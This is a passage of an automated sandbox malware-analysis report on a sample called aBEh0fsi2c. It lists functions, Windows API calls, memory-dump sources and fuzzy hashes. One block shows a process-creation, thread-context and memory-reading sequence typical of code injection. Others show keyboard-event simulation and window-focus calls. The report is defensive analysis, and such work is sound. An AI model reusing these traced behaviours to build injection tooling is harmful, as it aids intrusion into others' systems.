                                                            • Part of subcall function 0038859B: RaiseException.KERNEL32(?,?,?,00419E78,00000000,?,?,?,?,00380E06,?,00419E78,?,00000001), ref: 003885F0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: b6070de7e95b63457384120595cf140ef9454592ca3835305ac027210860dea3
                                                          • Instruction ID: 318c5d5e731fe41b6fef26192fb0546246f95aa7a1db71706a4fd8d4d9a32628
                                                          • Opcode Fuzzy Hash: b6070de7e95b63457384120595cf140ef9454592ca3835305ac027210860dea3
                                                          • Instruction Fuzzy Hash: 34F0F43540031EA6CB17BBA5EC019EF7BAC9F01310F1004A6FD149A281DFB09A8883D1
                                                          APIs
                                                            • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                          • __lock_file.LIBCMT ref: 003853EB
                                                            • Part of subcall function 00386C11: __lock.LIBCMT ref: 00386C34
                                                          • __fclose_nolock.LIBCMT ref: 003853F6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                          • Instruction ID: a87f1ecb5b7b55af8e1c857d4cd5a220cb19d91c3e6b99c2eea45e993a0708cf
                                                          • Opcode Fuzzy Hash: 22580836e1cee28497bb39efc7271d78d18f0fd3720244346dc71c0ff3a2b8f1
                                                          • Instruction Fuzzy Hash: 43F0B431801B049ADB23BF7598067AD7BE06F41375F6582C9E424AF1C1CFFC8A419B52
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 00E77F23
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E77FB9
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E77FDB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                          • Instruction ID: 6883ab89a0a3dec2578c1e1d1d6075c4c515a8bb5b44bf31a6c9b2685f26933d
                                                          • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                          • Instruction Fuzzy Hash: A412C024E14658C6EB24DF64D8507DEB272EF68300F10A0E9910DEB7A5E77A4F81CF5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction ID: 4d7b0a8849ebf0008d9c4bbb4d330e655d8fbd9f62c57faa3419a71fbf22d6f9
                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                          • Instruction Fuzzy Hash: 5131E270A002059FCB9AEF58C494A69F7B6FB49300B2586E5E80ACF751D631EEC5DB80
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 1278f01d2574e2d4fdc738452f7baf278147b03ea4f48bb01117c135eee1e93b
                                                          • Instruction ID: 2ee5b246e636f77ed7685bf23557f6219090282e0d45dbf482b9ed6a9367c98e
                                                          • Opcode Fuzzy Hash: 1278f01d2574e2d4fdc738452f7baf278147b03ea4f48bb01117c135eee1e93b
                                                          • Instruction Fuzzy Hash: 754127745047518FDB26DF24C454B1ABBE0BF45318F09C8ACE89A9B766C732E845CF52
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 6c6500a46772b76bae893456c1ac7a3ccb4a10f7aea5403709b5bda715c2235f
                                                          • Instruction ID: 9723ef57a606e467007e1a75d087b4233bbe752d0240b076cf5a85b95976760f
                                                          • Opcode Fuzzy Hash: 6c6500a46772b76bae893456c1ac7a3ccb4a10f7aea5403709b5bda715c2235f
                                                          • Instruction Fuzzy Hash: 1C213672604B09EBDF169F11F8417AA7BB8FB14350F21C46DE486CA194EB3095D0CB49
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
                                                          • Instruction ID: 049e89f7a235be5fd5b14a1a83eb7f010907fa2f807b51f0acb7e250de0ad1c2
                                                          • Opcode Fuzzy Hash: 4bc516ce2b159df6ae561d16dde780559593b119f0329b2b52b7213471dda11b
                                                          • Instruction Fuzzy Hash: 5B11E431208205ABC716DF28C886C6AB7A9EF45328764C61AF919CB398DB32EC11C790
                                                          APIs
                                                            • Part of subcall function 00364BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00364BEF
                                                            • Part of subcall function 0038525B: __wfsopen.LIBCMT ref: 00385266
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E0F
                                                            • Part of subcall function 00364B6A: FreeLibrary.KERNEL32(00000000), ref: 00364BA4
                                                            • Part of subcall function 00364C70: _memmove.LIBCMT ref: 00364CBA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                          • Instruction ID: fb2d8bf72d85372810e1b8339cb9e3da24de277cfe77e1771f4808bf14f36c04
                                                          • Opcode Fuzzy Hash: c4ae379b7e5c62f9828c55d32478d81b19e148bf9535258a9638f019abbb8fa3
                                                          • Instruction Fuzzy Hash: 4211E331A00205ABCF13BF70C816FAD77A8AF44710F10C829F541AF1C5DEB29A009BA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 8f1239c7572f3cacd7808f59993a474258d89301221991f0f633bf4abc5b4b89
                                                          • Instruction ID: f7cd2dded75aecf3129e27e4acb6a248c304ababda98aea73f2a880455e7be0d
                                                          • Opcode Fuzzy Hash: 8f1239c7572f3cacd7808f59993a474258d89301221991f0f633bf4abc5b4b89
                                                          • Instruction Fuzzy Hash: A2211374908741DFCB26DF64C454A1ABBE4BF88314F05896CF88A9B762D731E809CF92
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID:
                                                          • API String ID: 82841172-0
                                                          • Opcode ID: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                          • Instruction ID: 933d014c8b5d0bfcb88b19bafd2a9c78d90a05b2f2c92ff0dda46ebec127eadd
                                                          • Opcode Fuzzy Hash: c88b1d45fa533082644f8eec5a8da90621851afedfa5cc1a530cc671d9e8539b
                                                          • Instruction Fuzzy Hash: 3E01D671446944AFD712CB24E8C1EF877E8EF86220B1505E6ED48CBC35C62098D8CB91
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 003848A6
                                                            • Part of subcall function 00388B28: __getptd_noexit.LIBCMT ref: 00388B28
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                          • Instruction ID: 77f984f156d0bbc1a34e58e5152bdc821f53183d951162d0cb54838bc28d98ea
                                                          • Opcode Fuzzy Hash: 75ef7f13b69a37f5739f69d1e4505f902a8b200fa61a484f09ac1503a6518ff7
                                                          • Instruction Fuzzy Hash: 38F0C23190070AEBDF13BFB48C067EE3AA1AF00325F558494F4249E592CB79CA51DF51
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364E7E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                          • Instruction ID: 1edd2c9a8ad3afe7e143aee22228db0f724ebc5ceceedf6b616bd719dfda4076
                                                          • Opcode Fuzzy Hash: c8211da3005f915916b132b824a403448e220528d0430e2290d176c464f6a8a7
                                                          • Instruction Fuzzy Hash: BEF01571901B11CFCB369F64E494812BBE5BF14329321CA7EE1D686A24C7739840DB40
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003807B0
                                                            • Part of subcall function 00367BCC: _memmove.LIBCMT ref: 00367C06
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          • Opcode ID: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                          • Instruction ID: 863b9c71ffb9d930ee4711c2f0b203e07620095b8c090898e79d59ba1bc8a9d9
                                                          • Opcode Fuzzy Hash: 4c64a454ed80057744597ffae654d0455b5a149846094e8ba502d7e23e65a2ba
                                                          • Instruction Fuzzy Hash: BAE0CD369041285BC721D6589C05FFA77DDDF897A0F0442B5FD0CDB248DA609C8086D0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction ID: a4d3d7d242977b5a8b57a95baa685f8487ac5c22ea5aac9b9a86dafda0d054ca
                                                          • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                          • Instruction Fuzzy Hash: C5B0927644020C77CE022A82EC02A493B299B41764F408060FB0C1C162AA73A6649A89
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 00E78779
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1337653140.0000000000E76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E76000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_e76000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: af97dfdc726d40d09895ba04125c9bb0ad8008d5f16348b9cdb32079e1420672
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 65E0E67498020DDFDB40DFB4D64D69D7BB4EF04301F104161FD05E2280DA309D50CA62
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003ECB37
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECB95
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003ECBD6
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECC00
                                                          • SendMessageW.USER32 ref: 003ECC29
                                                          • _wcsncpy.LIBCMT ref: 003ECC95
                                                          • GetKeyState.USER32(00000011), ref: 003ECCB6
                                                          • GetKeyState.USER32(00000009), ref: 003ECCC3
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003ECCD9
                                                          • GetKeyState.USER32(00000010), ref: 003ECCE3
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003ECD0C
                                                          • SendMessageW.USER32 ref: 003ECD33
                                                          • SendMessageW.USER32(?,00001030,?,003EB348), ref: 003ECE37
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003ECE4D
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003ECE60
                                                          • SetCapture.USER32(?), ref: 003ECE69
                                                          • ClientToScreen.USER32(?,?), ref: 003ECECE
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003ECEDB
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003ECEF5
                                                          • ReleaseCapture.USER32 ref: 003ECF00
                                                          • GetCursorPos.USER32(?), ref: 003ECF3A
                                                          • ScreenToClient.USER32(?,?), ref: 003ECF47
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ECFA3
                                                          • SendMessageW.USER32 ref: 003ECFD1
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED00E
                                                          • SendMessageW.USER32 ref: 003ED03D
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003ED05E
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003ED06D
                                                          • GetCursorPos.USER32(?), ref: 003ED08D
                                                          • ScreenToClient.USER32(?,?), ref: 003ED09A
                                                          • GetParent.USER32(?), ref: 003ED0BA
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003ED123
                                                          • SendMessageW.USER32 ref: 003ED154
                                                          • ClientToScreen.USER32(?,?), ref: 003ED1B2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003ED1E2
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003ED20C
                                                          • SendMessageW.USER32 ref: 003ED22F
                                                          • ClientToScreen.USER32(?,?), ref: 003ED281
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003ED2B5
                                                            • Part of subcall function 003625DB: GetWindowLongW.USER32(?,000000EB), ref: 003625EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003ED351
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F$pbB
                                                          • API String ID: 3977979337-2595871605
                                                          • Opcode ID: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                          • Instruction ID: f0f56e86ba83f277df28317c02081c8e4a4f6e27bbde4262c5521dddf4c2a8e3
                                                          • Opcode Fuzzy Hash: 4714859737c231d10407a95a69f7209bff56bb18fe2bedf814b256774a2604d8
                                                          • Instruction Fuzzy Hash: 9E42CD342042D1AFDB26DF26C884AAABBE9FF49310F150A29F555CB2F0C771D852DB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: ]A$3c7$DEFINE$P\A$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_7
                                                          • API String ID: 1357608183-3946336730
                                                          • Opcode ID: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                          • Instruction ID: c404c411815d4621a5abf846e174d230fb8318a6e7c93d6c25fc525735fd8ed9
                                                          • Opcode Fuzzy Hash: 58f90922ac46001c1da9d4a1e1c980be59b8e96707a0f799d06a774d2b12c790
                                                          • Instruction Fuzzy Hash: B793B375E00215DBDB26CF58C881BEDB7B1FF48314F25816AEA49EB681E7749E81CB40
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 003648DF
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0039D665
                                                          • IsIconic.USER32(?), ref: 0039D66E
                                                          • ShowWindow.USER32(?,00000009), ref: 0039D67B
                                                          • SetForegroundWindow.USER32(?), ref: 0039D685
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0039D69B
                                                          • GetCurrentThreadId.KERNEL32 ref: 0039D6A2
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0039D6AE
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6BF
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0039D6C7
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0039D6CF
                                                          • SetForegroundWindow.USER32(?), ref: 0039D6D2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6E7
                                                          • keybd_event.USER32(00000012,00000000), ref: 0039D6F2
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D6FC
                                                          • keybd_event.USER32(00000012,00000000), ref: 0039D701
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D70A
                                                          • keybd_event.USER32(00000012,00000000), ref: 0039D70F
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0039D719
                                                          • keybd_event.USER32(00000012,00000000), ref: 0039D71E
